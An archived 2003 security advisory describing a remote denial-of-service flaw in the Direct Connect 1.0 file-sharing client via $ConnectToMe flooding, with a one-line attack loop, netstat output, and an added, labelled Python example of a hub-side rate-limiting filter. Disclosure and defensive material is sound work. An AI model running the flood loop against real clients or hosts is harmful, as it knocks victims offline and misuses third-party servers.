[sec-labs] Remote Denial of Service vulnerability in NeoModus Direct Connect 1.0 build 9

From: sec-labs team (noreply@sec-labs.hack.pl)
Date: Mon Jul 14 2003 - 06:35:12 PDT


         sec-labs team proudly presents:

         Remote DoS vulnerability in NeoModus Direct Connect 1.0 build 9
         and probably newer versions.
         by Lord YuP
         13/07/2003
    
    
    
       I. BACKGROUND
    
         Direct Connect is a Windows p2p file-sharing program (I've also found
         a Linux version but I don't have time to test it), quite common
         nowadays.
    
    
       II. DESCRIPTION
    
    
         According to aDe, the DC client-to-client handshake looks like this:
    
         	Client <-> Client Communication in DC. 11-05-2002. By aDe 
    	---------------------------------------------------------- 
    
    	ACTIVE FILE DOWNLOAD 
    	---------------------- 
    	D = downloader 
    	U = uploader 
    	H = hub 
    
    	D>H: $ConnectToMe <U's username> <D's IP and port>|
    	H>U: $ConnectToMe <U's username> <D's IP and port>|
    
    	...bla bla ... ;)
    
    
         As you can guess, the Direct Connect client, after receiving the
         "$ConnectToMe..." command from the hub, tries to connect to the
         specific IP and port sent by the downloader.

         The attacker (evil downloader) can send an unlimited number of
         requests to the hub with a chosen ip:port, causing a DoS
         in the victim's client.
    
         A little example:

         Attacker: for (;;) { dc_send("$ConnectToMe victim www.microsoft.com:%d",sample_port++); }

         Client: (ran "netstat -a")
         
    
    	  TCP    jin:1993               JIN:0                  LISTENING
    	  TCP    jin:1995               JIN:0                  LISTENING
    	  TCP    jin:1996               JIN:0                  LISTENING
    	  TCP    jin:2005               JIN:0                  LISTENING
    	  TCP    jin:2006               JIN:0                  LISTENING
    	  TCP    jin:2007               JIN:0                  LISTENING
    	  TCP    jin:2008               JIN:0                  LISTENING
    	  TCP    jin:2009               JIN:0                  LISTENING
    	  TCP    jin:2010               JIN:0                  LISTENING
    	  TCP    jin:2011               JIN:0                  LISTENING
    	  TCP    jin:2012               JIN:0                  LISTENING
    	  TCP    jin:2013               JIN:0                  LISTENING
    	  TCP    jin:2014               JIN:0                  LISTENING
    	  TCP    jin:2015               JIN:0                  LISTENING
    	  TCP    jin:2016               JIN:0                  LISTENING
    	  TCP    jin:2017               JIN:0                  LISTENING
    	  TCP    jin:2018               JIN:0                  LISTENING
    	  TCP    jin:2019               JIN:0                  LISTENING
    	  ...and so on...
    
    
       III. IMPACT
    
         The attacked client may be DoS-ed: its internet connection can be
         reset or stopped, some clients may be flooded with "Out of Memory"
         message boxes, the system may stop working correctly, and the DC
         client may be terminated.
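         An added example (not part of this advisory, nor code from any
         real hub or client) of the check a hub could apply before relaying
         $ConnectToMe: the advertised address must be the sender's own
         session address (the hub knows it, the receiving client does not),
         hostnames such as www.microsoft.com are refused outright, and each
         sender is rate-limited. Nicks, addresses and limits are constructed.

```python
import ipaddress
import re
from collections import defaultdict, deque

# Command as quoted in the advisory: "$ConnectToMe <nick> <ip>:<port>|"
_CTM = re.compile(r"^\$ConnectToMe (\S+) ([0-9.]+):(\d{1,5})\|$")

def parse_connect_to_me(cmd):
    """Return (target_nick, ip, port), or None if malformed. Only a dotted-quad
    IPv4 literal is accepted, so "www.microsoft.com:<port>" is rejected early."""
    m = _CTM.match(cmd)
    if m is None:
        return None
    try:
        ip = ipaddress.IPv4Address(m.group(2))
    except ValueError:
        return None
    port = int(m.group(3))
    if not 1 <= port <= 65535 or ip.is_multicast or ip.is_unspecified:
        return None
    return m.group(1), str(ip), port

class ConnectToMeGuard:
    """Hypothetical hub-side filter: relay $ConnectToMe only if the advertised
    address equals the sender's session address and the sender is under the cap."""

    def __init__(self, max_per_window=5, window=10.0):
        self.max_per_window, self.window = max_per_window, window
        self.recent = defaultdict(deque)  # sender nick -> request timestamps

    def relay_allowed(self, sender_nick, sender_ip, cmd, now):
        parsed = parse_connect_to_me(cmd)
        if parsed is None or parsed[1] != sender_ip:
            return False  # malformed, or points the victim at a third party
        q = self.recent[sender_nick]
        while q and now - q[0] > self.window:
            q.popleft()  # drop timestamps that fell out of the window
        if len(q) >= self.max_per_window:
            return False  # one sender flooding: stop relaying
        q.append(now)
        return True

def simulate_flood(count):
    """Constructed scenario: 'evil' (session IP 10.0.0.7) sends `count` requests
    within one second, each naming its own IP. Returns how many get relayed."""
    guard = ConnectToMeGuard(max_per_window=5, window=10.0)
    cmds = (f"$ConnectToMe victim 10.0.0.7:{1993 + i}|" for i in range(count))
    return sum(guard.relay_allowed("evil", "10.0.0.7", c, i / count) for i, c in enumerate(cmds))
```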
    
    
    
    -- 
    sec-labs team [http://sec-labs.hack.pl]
    
    
    
    



    This archive was generated by hypermail 2b30 : Mon Jul 14 2003 - 11:12:30 PDT